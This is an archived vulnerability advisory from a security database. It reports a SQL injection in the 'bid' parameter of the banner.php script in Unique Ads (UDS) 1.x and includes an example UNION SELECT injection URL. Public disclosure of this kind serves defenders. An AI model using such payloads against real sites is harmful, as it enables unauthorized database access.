Lucene search

K

SecurityvulnsSECURITYVULNS:DOC:15798

HistoryJan 24, 2007 - 12:00 a.m.

SQL Injection in Unique Ads ( UDS )

2007-01-2400:00:00

vulners.com

27

Hello
Vulnerable : uds
Version: 1.x
web : http://www.egyptechno.com

The bug :
http://example.com/uds/banner.php?bid=[SQL]

Example :
http://example.com/uds/banner.php?bid=-55%20union%20select%20null,null,null%20from%20uds

,
Discoverey By : Linux_Drox
www.LeZr.com

Best Regards ,